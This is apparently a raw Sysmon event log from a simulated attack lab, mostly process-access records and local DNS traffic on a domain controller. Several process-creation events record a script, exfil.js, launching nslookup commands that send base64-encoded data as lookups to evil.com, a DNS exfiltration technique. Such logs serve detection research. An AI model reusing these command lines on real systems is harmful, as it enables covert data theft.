14:16:25.134{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.134{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.134{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.134{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-AD3F-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.134{2E1864BB-17B9-629A-AB3F-000000005F02}17006576C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-AD3F-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.138{2E1864BB-17B9-629A-AD3F-000000005F02}4832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-AB3F-000000005F02}1700C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldrwke.tmp 2>&1 10341000x8000000000000000198509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.102{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-AC3F-000000005F02}7300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.102{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-AC3F-000000005F02}7300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.102{2E1864BB-17B9-629A-AC3F-000000005F02}73006232C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-AB3F-000000005F02}1700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.102{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-AC3F-000000005F02}7300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.098{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-AB3F-000000005F02}1700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.096{2E1864BB-17A1-629A-783D-000000005F02}55527664C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-AB3F-000000005F02}1700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.097{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.096{2E1864BB-17B9-629A-AB3F-000000005F02}1700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldrwke.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.080{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlewwoxo.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.064{2E1864BB-17B8-629A-A93F-000000005F02}10803288C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-AA3F-000000005F02}3956C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.049{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-AA3F-000000005F02}3956C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.049{2E1864BB-17B8-629A-A83F-000000005F02}44842104C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-AA3F-000000005F02}3956C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.061{2E1864BB-17B9-629A-AA3F-000000005F02}3956C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-A83F-000000005F02}4484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlewwoxo.tmp 2>&1 354300x8000000000000000198489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52526- 354300x8000000000000000198488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.816{00000000-0000-0000-0000-000000000000}6028<unknown process>-udpfalsefalse127.0.0.1-52512-false127.0.0.1-53domain 354300x8000000000000000198487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.816{00000000-0000-0000-0000-000000000000}6028<unknown process>-udptruefalse127.0.0.1-52512-false127.0.0.1-53domain 354300x8000000000000000198486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.816{00000000-0000-0000-0000-000000000000}6028<unknown process>-udpfalsefalse127.0.0.1-52511-false127.0.0.1-53domain 354300x8000000000000000198485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.816{00000000-0000-0000-0000-000000000000}6028<unknown process>-udptruefalse127.0.0.1-52511-false127.0.0.1-53domain 354300x8000000000000000198484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.815{00000000-0000-0000-0000-000000000000}6028<unknown process>-udpfalsefalse127.0.0.1-52510-false127.0.0.1-53domain 354300x8000000000000000198483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.815{00000000-0000-0000-0000-000000000000}6028<unknown process>-udptruefalse127.0.0.1-52510-false127.0.0.1-53domain 354300x8000000000000000198482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{00000000-0000-0000-0000-000000000000}4592<unknown process>-udpfalsefalse127.0.0.1-52509-false127.0.0.1-53domain 354300x8000000000000000198481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{00000000-0000-0000-0000-000000000000}4592<unknown process>-udpfalsefalse127.0.0.1-52508-false127.0.0.1-53domain 354300x8000000000000000198480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{00000000-0000-0000-0000-000000000000}4592<unknown process>-udptruefalse127.0.0.1-52508-false127.0.0.1-53domain 354300x8000000000000000198479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{00000000-0000-0000-0000-000000000000}4592<unknown process>-udpfalsefalse127.0.0.1-52507-false127.0.0.1-53domain 354300x8000000000000000198478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-52504-false127.0.0.1-53domain 354300x8000000000000000198477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.165{00000000-0000-0000-0000-000000000000}8<unknown process>-udptruefalse127.0.0.1-52499-false127.0.0.1-53domain 354300x800000000000000043930Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:23.714{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52324-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043929Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:25.026{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C1E9AFD74DD9A5804BFFD028DD75F62,SHA256=42E39C3C9CE33417C3D8761BAC8B6A51DC1CA7D39CE4B8DD325D0C130EF3BFE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 